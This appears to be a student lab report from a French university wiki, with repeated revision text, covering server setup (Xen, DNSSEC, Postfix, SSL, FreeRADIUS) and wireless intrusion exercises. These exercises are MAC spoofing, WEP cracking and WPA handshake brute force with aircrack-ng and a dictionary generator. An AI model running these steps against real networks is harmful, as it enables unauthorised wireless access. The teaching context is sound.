// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
# /etc/ssh/sshd_config<br />
# PermitRootLogin yes<br />
<br />
# if down eth0 <br />
# ifup etho<br />
# apt-get purge network-manage systemd <br />
# inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
# service bind9 stop<br />
# service bind9 start<br />
</pre><br />
<br />
<br />
Géneration d'une clés assymetrique:<br />
<pre><br />
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE love-in-the-world.space<br />
Generating key pair...........+++ ....................+++ <br />
Klove-in-the-world.space.+005+14281<br />
# mv Klove-in-the-world.space.+005+14281.key love-in-the-world-ksk.key<br />
# mv Klove-in-the-world.space.+005+14281.private love-in-the-world-ksk.private<br />
<br />
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE love-in-the-world.space<br />
Generating key pair........++++++ .....................++++++ <br />
Klove-in-the-world.space.+005+37866<br />
# mv Klove-in-the-world.space.+005+37866.key love-in-the-world-zsk.key<br />
# mv Klove-in-the-world.space.+005+37866.private love-in-the-world-zsk.private<br />
<br />
# dnssec-signzone -o love-in-the-world.space -k love-in-the-world-ksk ../db.love-in-the-world love-in-the-world-zsk<br />
Verifying the zone using the following algorithms: RSASHA1.<br />
Zone fully signed:<br />
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked<br />
ZSKs: 1 active, 0 stand-by, 0 revoked<br />
../db.love-in-the-world.signed<br />
root@chien:/etc/bind/love-in-the-world# <br />
<br />
:/etc/bind# nano named.conf.local <br />
zone "love-in-the-world.space"{<br />
<br />
type master;<br />
file "/etc/bind/db.love-in-the-world.signed";<br />
};<br />
</pre><br />
<br />
<br />
ensuite on copie le contenu du fichier:<br />
dans gandi.net <br />
<br />
<br />
on peut verifier que notre dns est secure a l'adresse suivante:<br />
http://dnsviz.net/d/love-in-the-world.space/dnssec/<br />
<br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
# apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
# nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
# newaliases<br />
# mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
# mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<pre><br />
#nano 000-domain.tld-ssl.conf<br />
<VirtualHost 193.48.57.181:443><br />
<br />
ServerName www.love-in-the-world.space<br />
ServerAlias love-in-the-world.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /root/chien.crt<br />
SSLCertificateKeyFile /root/chien.key<br />
SSLCertificateChainFile /root/gandi.crt<br />
SSLVerifyClient None<br />
<br />
</VirtualHost><br />
<br />
#a2enmod ssl<br />
#service apache2 reload<br />
</pre><br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
# cat /etc/network/interfaces<br />
# source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
# auto lo<br />
# iface lo inet loopback<br />
<br />
Ethernet interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 172.26.79.241<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
# apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
# ls<br />
# aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
# gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
# ./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
aircrack-ng -w Dico wpacracotte06-02.cap<br />
</pre><br />
<br />
après quelle que heures j'obtiens la clès:<br />
<pre><br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[02:00:57] 12399908 keys tested (1782.72 k/s)<br />
<br />
<br />
KEY FOUND! [ 12399906 ]<br />
<br />
<br />
Master Key : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B <br />
75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 <br />
<br />
Transient Key : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E <br />
94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E <br />
F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E <br />
22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E <br />
<br />
EAPOL HMAC : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD <br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23393
TP sysres IMA2a5 2015/2016 G3
2015-11-27T13:49:34Z
<p>Mstrunc : </p>
<hr />
<div><br /><br />
Ce mini projet a pour but de nous donner des notion en sécurité informatique.<br />
<br />
<br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<h2>Sécurisation Wifi par WPA2-EAP</h2><br />
<br />
<h3>Configuration du point d’accès</h3><br />
On commence par remettre le point d’accès en configuration d'usine <br />
<pre><br />
ap#erase startup-config<br />
ap#reload<br />
</pre><br />
<br />
Configuration:<br />
<pre><br />
ap(config)#line vty 0 15 <br />
ap(config-line)#password ****<br />
<br />
ap(config)#ip default-gateway 172.20.99.254<br />
<br />
ap(config)#interface bvi 1 <br />
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 <br />
</pre><br />
<br />
<h3>Configuration de la machine virtuel</h3><br />
<br />
On installe freeradius: <br />
<pre><br />
# apt-get install FreeRadius<br />
</pre><br />
<br />
On configure la conexion:<br />
<pre><br />
# nano eap.conf<br />
// on remplace <br />
default_eap_type = md5<br />
// par<br />
default_eap_type = peap<br />
<br />
# nano clients.conf <br />
client 172.20.99.0/24 {<br />
secret = topsecret<br />
shortname = wifi<br />
<br />
# nano users <br />
john Cleartext-Password := "****"<br />
<br />
# service freeradius restart<br />
</pre><br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
# /etc/ssh/sshd_config<br />
# PermitRootLogin yes<br />
<br />
# if down eth0 <br />
# ifup etho<br />
# apt-get purge network-manage systemd <br />
# inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
# service bind9 stop<br />
# service bind9 start<br />
</pre><br />
<br />
<br />
Géneration d'une clés assymetrique:<br />
<pre><br />
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE love-in-the-world.space<br />
Generating key pair...........+++ ....................+++ <br />
Klove-in-the-world.space.+005+14281<br />
# mv Klove-in-the-world.space.+005+14281.key love-in-the-world-ksk.key<br />
# mv Klove-in-the-world.space.+005+14281.private love-in-the-world-ksk.private<br />
<br />
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE love-in-the-world.space<br />
Generating key pair........++++++ .....................++++++ <br />
Klove-in-the-world.space.+005+37866<br />
# mv Klove-in-the-world.space.+005+37866.key love-in-the-world-zsk.key<br />
# mv Klove-in-the-world.space.+005+37866.private love-in-the-world-zsk.private<br />
<br />
# dnssec-signzone -o love-in-the-world.space -k love-in-the-world-ksk ../db.love-in-the-world love-in-the-world-zsk<br />
Verifying the zone using the following algorithms: RSASHA1.<br />
Zone fully signed:<br />
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked<br />
ZSKs: 1 active, 0 stand-by, 0 revoked<br />
../db.love-in-the-world.signed<br />
root@chien:/etc/bind/love-in-the-world# <br />
<br />
:/etc/bind# nano named.conf.local <br />
zone "love-in-the-world.space"{<br />
<br />
type master;<br />
file "/etc/bind/db.love-in-the-world.signed";<br />
};<br />
</pre><br />
<br />
<br />
ensuite on copie le contenu du fichier:<br />
dans gandi.net <br />
<br />
<br />
on peut verifier que notre dns est secure a l'adresse suivante:<br />
http://dnsviz.net/d/love-in-the-world.space/dnssec/<br />
<br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
# apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
# nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
# newaliases<br />
# mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
# mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<pre><br />
#nano 000-domain.tld-ssl.conf<br />
<VirtualHost 193.48.57.181:443><br />
<br />
ServerName www.love-in-the-world.space<br />
ServerAlias love-in-the-world.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /root/chien.crt<br />
SSLCertificateKeyFile /root/chien.key<br />
SSLCertificateChainFile /root/gandi.crt<br />
SSLVerifyClient None<br />
<br />
</VirtualHost><br />
<br />
#a2enmod ssl<br />
#service apache2 reload<br />
</pre><br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
# cat /etc/network/interfaces<br />
# source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
# auto lo<br />
# iface lo inet loopback<br />
<br />
Ethernet interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 172.26.79.241<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
# apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
